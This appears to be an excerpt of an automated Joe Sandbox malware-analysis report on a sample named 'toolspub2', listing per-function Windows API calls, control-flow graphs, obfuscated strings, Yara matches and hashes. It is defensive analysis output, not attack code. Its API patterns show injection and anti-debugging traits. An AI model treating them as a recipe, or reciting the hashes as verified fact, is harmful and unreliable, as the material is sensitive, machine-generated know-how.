                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 145 411a54-411a5e 146 411a60-411a6a 145->146 147 411a7b-411a84 145->147 146->147 148 411a6c-411a7a call 40a8ef 146->148 149 411a87-411a8c 147->149 150 411a86 147->150 152 411aa1-411aa8 149->152 153 411a8e-411a9f RtlAllocateHeap 149->153 150->149 156 411ac6-411acb 152->156 157 411aaa-411ab3 call 40af86 152->157 153->152 155 411ad3-411ad5 153->155 156->155 158 411acd 156->158 157->149 161 411ab5-411aba 157->161 158->155 162 411ac2-411ac4 161->162 163 411abc 161->163 162->155 163->162
                                                                                                                                                              APIs
                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0040A6C2,00000000,?,00000000,00000000,00000000,?,0040C1B2,00000001,00000214), ref: 00411A97
                                                                                                                                                                • Part of subcall function 0040A8EF: __getptd_noexit.LIBCMT ref: 0040A8EF
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocateHeap__getptd_noexit
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 328603210-0
                                                                                                                                                              • Opcode ID: 7631eb4d99a9ac7973f15a4bec861ca08531e038e7d5a0e1ffea8794d642c478
                                                                                                                                                              • Instruction ID: be9b047a429eaf5cad6436437b1c02e6f641f4c633c8649e7acb7c0fdf8b2f54
                                                                                                                                                              • Opcode Fuzzy Hash: 7631eb4d99a9ac7973f15a4bec861ca08531e038e7d5a0e1ffea8794d642c478
                                                                                                                                                              • Instruction Fuzzy Hash: 8F01B1713066159AEB259F25DC44BE73B94EF813A1F04852BEA19CA2F0D77898908698
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 164 9580c3-9580fd call 9583d6 167 9580ff-958132 VirtualAlloc call 958150 164->167 168 95814b 164->168 170 958137-958149 167->170 168->168 170->168
                                                                                                                                                              APIs
                                                                                                                                                              • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 00958114
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2155575698.0000000000952000.00000040.00000020.00020000.00000000.sdmp, Offset: 00952000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_952000_toolspub2.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                              • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                              • Instruction ID: caa7e4190025b36cf308abf77fefc191c7c3ecd450a7d42db22581cc64fc7d6d
                                                                                                                                                              • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                                                                                                              • Instruction Fuzzy Hash: 29113C79A00208EFDB01DF99C985E99BFF5AF08751F0580A4F948AB362D771EA50DF80
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • CharUpperW.USER32(00000000,3ADE7A91,698C5357,41D8CE48,25C1687E,418F6582,698C5357,048B4B8D,17C9A0AF,6F52AFFE,22C9DDBD,566AD047,68316C5B,3158AF5F,1CE65E10,25213482), ref: 0042B478
                                                                                                                                                                • Part of subcall function 00429C40: CharToOemBuffA.USER32(00000000,00000000,00000000), ref: 00429C6D
                                                                                                                                                                • Part of subcall function 00429C40: AddConsoleAliasW.KERNEL32(00000000,00000000,00000000,1FF896F3,7694FB30,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678), ref: 00429C7E
                                                                                                                                                                • Part of subcall function 00429C40: GetAltTabInfoA.USER32(00000000,00000000,00000000,00000000,00000000,1FF896F3,7694FB30,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729), ref: 00429CBF
                                                                                                                                                                • Part of subcall function 00429C40: DrawCaption.USER32(00000000,00000000,00000000,00000000), ref: 00429CC9
                                                                                                                                                                • Part of subcall function 00429C40: WinHttpGetProxyForUrl.WINHTTP(00000000,zitecihucepikigibecit,00000000,684C9EF0,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763), ref: 00429CDB
                                                                                                                                                                • Part of subcall function 00429C40: SetThreadContext.KERNEL32(00000000,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569), ref: 00429CEC
                                                                                                                                                                • Part of subcall function 00429C40: GetFileAttributesExA.KERNEL32(fowigesu lonemofalahez yeyinizesorazepa cazohopegopipoc,00000000,?,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87), ref: 00429D00
                                                                                                                                                                • Part of subcall function 00429C40: DragAcceptFiles.SHELL32(00000000,00000000), ref: 00429D08
                                                                                                                                                                • Part of subcall function 00429C40: CoGetInstanceFromFile.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,3F7F80AC,00000000,?,?,m~W ,0042B9B7,4CC2D44F,7B4F1FF6,32029781,5267C93B), ref: 00429D1A
                                                                                                                                                                • Part of subcall function 00429C40: __putw.LIBCMT ref: 00429D32
                                                                                                                                                              • GetTempPathA.KERNEL32(1FF896F3,?,4CC2D44F,7B4F1FF6,32029781,5267C93B,7E719729,549BF258,78004678,12D1A763,1ED99A87,38EE1569,5EBC0077,6D5D0E80,07780C44,31630C95), ref: 0042B9CB
                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(1FF896F3,?,?,00000000), ref: 0042B9D9
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CharFile$AcceptAliasAttributesBuffCaptionConsoleContextCurrentDirectoryDragDrawFilesFromHttpInfoInstancePathProxyTempThreadUpper__putw
                                                                                                                                                              • String ID: .V $$iEz$+.h$7(C$=)W{$E!{$K"M`$O2l[$S"Z$T`"+$WTE$X!pq$Yx@t$[l1h$\Sj=$`*T$c<z$fPT$gew$hRjT$msX?$m~W $o%HQ$ogr($rNr<$sB1s$u+[$|59M$)\2
                                                                                                                                                              • API String ID: 1229265645-4214339544
                                                                                                                                                              • Opcode ID: 80365f742b4ad3ac1a843e1a0d8e6e951492917d86867d8317433c468aafcb6f
                                                                                                                                                              • Instruction ID: 2c32f343e4680c3eb39119d33b8846961cdd97289238ff00558c92a9b8afee93
                                                                                                                                                              • Opcode Fuzzy Hash: 80365f742b4ad3ac1a843e1a0d8e6e951492917d86867d8317433c468aafcb6f
                                                                                                                                                              • Instruction Fuzzy Hash: F0A2B9B9E012298BCB648FAAD9897CCF7B4BF09314F5085C8E54AAB611D7309EC1CF45
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • WriteConsoleInputW.KERNEL32(00000000,00000000,00000000,?), ref: 00429A77
                                                                                                                                                              • WriteConsoleInputW.KERNEL32(00000000,00000000,00000000,?), ref: 00429B53
                                                                                                                                                              • GlobalGetAtomNameA.KERNEL32(00000000,?,00000000), ref: 00429B94
                                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 00429BA1
                                                                                                                                                              • GetCommandLineA.KERNEL32 ref: 00429BDE
                                                                                                                                                              • MoveFileWithProgressW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00429C08
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ConsoleFileInputWrite$AtomCommandFindGlobalLineMoveNameNextProgressWith
                                                                                                                                                              • String ID: $yinimigibinubase wadulehujelevelikamupoy
                                                                                                                                                              • API String ID: 2196092271-1017807911
                                                                                                                                                              • Opcode ID: 4571bce14c01ff8bc8952fceb986d2739a3f5cbc1dd65224f54043612bf3d12b
                                                                                                                                                              • Instruction ID: bb3f097f5042ae0023657aa6e0f55cba338bfdf33f052d5af88b00b71c098cf3
                                                                                                                                                              • Opcode Fuzzy Hash: 4571bce14c01ff8bc8952fceb986d2739a3f5cbc1dd65224f54043612bf3d12b
                                                                                                                                                              • Instruction Fuzzy Hash: 495148716083418FD350CF29E944A1AB7F5FBC8704F408A2EF59997360D734A909CF9A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • WriteConsoleInputW.KERNEL32(00000000,00000000,00000000,?), ref: 00429A77
                                                                                                                                                              • WriteConsoleInputW.KERNEL32(00000000,00000000,00000000,?), ref: 00429B53
                                                                                                                                                              • GlobalGetAtomNameA.KERNEL32(00000000,?,00000000), ref: 00429B94
                                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 00429BA1
                                                                                                                                                              • GetCommandLineA.KERNEL32 ref: 00429BDE
                                                                                                                                                              • MoveFileWithProgressW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00429C08
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ConsoleFileInputWrite$AtomCommandFindGlobalLineMoveNameNextProgressWith
                                                                                                                                                              • String ID: $yinimigibinubase wadulehujelevelikamupoy
                                                                                                                                                              • API String ID: 2196092271-1017807911
                                                                                                                                                              • Opcode ID: 04a7ad8744d7c6bcb5d0807dd582ef58581822fca8244814fa6a41af49e36e83
                                                                                                                                                              • Instruction ID: ca2d7b81472e58b6c83b046dbca82f6470698ae172e04f4224ebff5586b8a7fd
                                                                                                                                                              • Opcode Fuzzy Hash: 04a7ad8744d7c6bcb5d0807dd582ef58581822fca8244814fa6a41af49e36e83
                                                                                                                                                              • Instruction Fuzzy Hash: 0D5127706083428FD350CF29E944A1AB7F5FBC8714F408A2EF59997360D734A909CF9A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • WriteConsoleInputW.KERNEL32(00000000,00000000,00000000,?), ref: 00429953
                                                                                                                                                              • GlobalGetAtomNameA.KERNEL32(00000000,?,00000000), ref: 00429992
                                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0042999E
                                                                                                                                                              • GetCommandLineA.KERNEL32 ref: 004299DB
                                                                                                                                                              • MoveFileWithProgressW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00429A03
                                                                                                                                                              • FindFirstFileW.KERNEL32(yinimigibinubase wadulehujelevelikamupoy,?), ref: 00429A13
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$Find$AtomCommandConsoleFirstGlobalInputLineMoveNameNextProgressWithWrite
                                                                                                                                                              • String ID: $yinimigibinubase wadulehujelevelikamupoy
                                                                                                                                                              • API String ID: 2448517103-1017807911
                                                                                                                                                              • Opcode ID: 4ee198126cecfd5d18ba3afd991a0483246c6cc7c1d5322ffbae539aef079f95
                                                                                                                                                              • Instruction ID: fbaa84ce5cce19cbdbca4aad296b96af5743f2ca72eaf92979516103a8ab62fc
                                                                                                                                                              • Opcode Fuzzy Hash: 4ee198126cecfd5d18ba3afd991a0483246c6cc7c1d5322ffbae539aef079f95
                                                                                                                                                              • Instruction Fuzzy Hash: E951D5B16083419FC344CF69E88491BB7E5FBC8318F408A2EF59993360D734A949CF9A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • WriteConsoleInputW.KERNEL32(00000000,00000000,00000000,?), ref: 00429B53
                                                                                                                                                              • GlobalGetAtomNameA.KERNEL32(00000000,?,00000000), ref: 00429B94
                                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 00429BA1
                                                                                                                                                              • GetCommandLineA.KERNEL32 ref: 00429BDE
                                                                                                                                                              • MoveFileWithProgressW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00429C08
                                                                                                                                                              • FindFirstFileW.KERNEL32(yinimigibinubase wadulehujelevelikamupoy,?), ref: 00429C18
                                                                                                                                                              Strings
                                                                                                                                                              • yinimigibinubase wadulehujelevelikamupoy, xrefs: 00429C13
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$Find$AtomCommandConsoleFirstGlobalInputLineMoveNameNextProgressWithWrite
                                                                                                                                                              • String ID: yinimigibinubase wadulehujelevelikamupoy
                                                                                                                                                              • API String ID: 2448517103-3021700487
                                                                                                                                                              • Opcode ID: 6d1401de17ff3481f19bd6da344e4752a93bce8f54b1c3dd3d257aa0ccc7f856
                                                                                                                                                              • Instruction ID: c6dc2a73c98c535e9e4092ee17d555c2f8d5d5c81904414914735247335d47df
                                                                                                                                                              • Opcode Fuzzy Hash: 6d1401de17ff3481f19bd6da344e4752a93bce8f54b1c3dd3d257aa0ccc7f856
                                                                                                                                                              • Instruction Fuzzy Hash: B84126706083428FD750CF69E844B1AB7E1FFC8714F408A2EF59997290DB74A909CF9A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • IsDebuggerPresent.KERNEL32 ref: 0040DB27
                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040DB3C
                                                                                                                                                              • UnhandledExceptionFilter.KERNEL32(HGC), ref: 0040DB47
                                                                                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 0040DB63
                                                                                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 0040DB6A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                              • String ID: HGC
                                                                                                                                                              • API String ID: 2579439406-3508915330
                                                                                                                                                              • Opcode ID: f4ce03ae630d9c7534803f7b77843c481b2474422cb5c3e1a9256cfbe20abb21
                                                                                                                                                              • Instruction ID: 62c41ed6742343c38e09831578c6ef5286b6a35ce24509409835bce0994f289b
                                                                                                                                                              • Opcode Fuzzy Hash: f4ce03ae630d9c7534803f7b77843c481b2474422cb5c3e1a9256cfbe20abb21
                                                                                                                                                              • Instruction Fuzzy Hash: E621EF789003889FD358EF65F9846843BF4FB88310F61247AE508973A0D7B46985CF0D
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,2000000B,00000000,00000002,?,?,00410109,?,00409658,?,000000BC,?,00000001,00000000,00000000), ref: 0040FB0B
                                                                                                                                                              • GetLocaleInfoW.KERNEL32(?,20001004,00000000,00000002,?,?,00410109,?,00409658,?,000000BC,?,00000001,00000000,00000000), ref: 0040FB34
                                                                                                                                                              • GetACP.KERNEL32(?,?,00410109,?,00409658,?,000000BC,?,00000001,00000000), ref: 0040FB48
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: InfoLocale
                                                                                                                                                              • String ID: ACP$OCP
                                                                                                                                                              • API String ID: 2299586839-711371036
                                                                                                                                                              • Opcode ID: cdb6ad7b1bf60883c83d79ade6cd974f415e109b9f955d88e479cef7e6e52d42
                                                                                                                                                              • Instruction ID: d23c5ff0868376c525835106792a3a6232b63bf11401bd391cd638001cdf541d
                                                                                                                                                              • Opcode Fuzzy Hash: cdb6ad7b1bf60883c83d79ade6cd974f415e109b9f955d88e479cef7e6e52d42
                                                                                                                                                              • Instruction Fuzzy Hash: 7901B130601207BAEB359FA1ED56F9B77BCAB40358F20003AF501F19D0EB78EA459A5C
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_0000C788), ref: 0040C7CF
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153441674.0000000000430000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153589633.0000000000433000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153832865.00000000007BB000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_400000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3192549508-0
                                                                                                                                                              • Opcode ID: 769ea726349dfd556cfa14b8e0e40af282eb8453c8e8ec2422ba065d32b712c5
                                                                                                                                                              • Instruction ID: ae92c47ee9e9c6054a4e6049fc2ad53bf17f23e99eafb1f73ca83a6c854442a5
                                                                                                                                                              • Opcode Fuzzy Hash: 769ea726349dfd556cfa14b8e0e40af282eb8453c8e8ec2422ba065d32b712c5
                                                                                                                                                              • Instruction Fuzzy Hash: 2390026039110186C60057F45D8D50526D06A8878679105B57501F50E4DBB44005591E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2155575698.0000000000952000.00000040.00000020.00020000.00000000.sdmp, Offset: 00952000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_952000_toolspub2.jbxd
                                                                                                                                                              Yara matches
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                              • Instruction ID: b8c75de490fbc8f2467d333937bf90f44a850fd06bb80f24a59196211d62056a
                                                                                                                                                              • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                              • Instruction Fuzzy Hash: 5B118E72344100AFD754DF96EC91FA6B3EAEF88321B298065ED04CB356E679ED02C760
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2154338530.0000000000830000.00000040.00001000.00020000.00000000.sdmp, Offset: 00830000, based on PE: false
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_3_2_830000_toolspub2.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID:
                                                                                                                                                              • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                              • Instruction ID: a1239e4c62c9675da8cde8102ce9091fd36aa3c047204cf6459d8299915e3759
                                                                                                                                                              • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                                                                                                                              • Instruction Fuzzy Hash: 801170723405009FD758DE69DCE1FA673EAFB88320B298155E908CB312D675EC01CBA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,0040861B), ref: 0040C351
                                                                                                                                                              • __mtterm.LIBCMT ref: 0040C35D
                                                                                                                                                                • Part of subcall function 0040C096: DecodePointer.KERNEL32(00000005,0040C4BF,?,0040861B), ref: 0040C0A7
                                                                                                                                                                • Part of subcall function 0040C096: TlsFree.KERNEL32(0000000D,0040C4BF,?,0040861B), ref: 0040C0C1
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0040C373
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0040C380
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 0040C38D
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,FlsFree), ref: 0040C39A
                                                                                                                                                              • TlsAlloc.KERNEL32(?,0040861B), ref: 0040C3EA
                                                                                                                                                              • TlsSetValue.KERNEL32(00000000,?,0040861B), ref: 0040C405
                                                                                                                                                              • __init_pointers.LIBCMT ref: 0040C40F
                                                                                                                                                              • EncodePointer.KERNEL32(?,0040861B), ref: 0040C420
                                                                                                                                                              • EncodePointer.KERNEL32(?,0040861B), ref: 0040C42D
                                                                                                                                                              • EncodePointer.KERNEL32(?,0040861B), ref: 0040C43A
                                                                                                                                                              • EncodePointer.KERNEL32(?,0040861B), ref: 0040C447
                                                                                                                                                              • DecodePointer.KERNEL32(0040C21A,?,0040861B), ref: 0040C468
                                                                                                                                                              • __calloc_crt.LIBCMT ref: 0040C47D
                                                                                                                                                              • DecodePointer.KERNEL32(00000000,?,0040861B), ref: 0040C497
                                                                                                                                                              • __initptd.LIBCMT ref: 0040C4A2
                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 0040C4A9
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000003.00000002.2152997322.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 00000003.00000002.2152847235.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                              • Associated: 00000003.00000002.2153285719.000000000042F000.00000004.00000001.01000000.00000007.sdmpDownload File
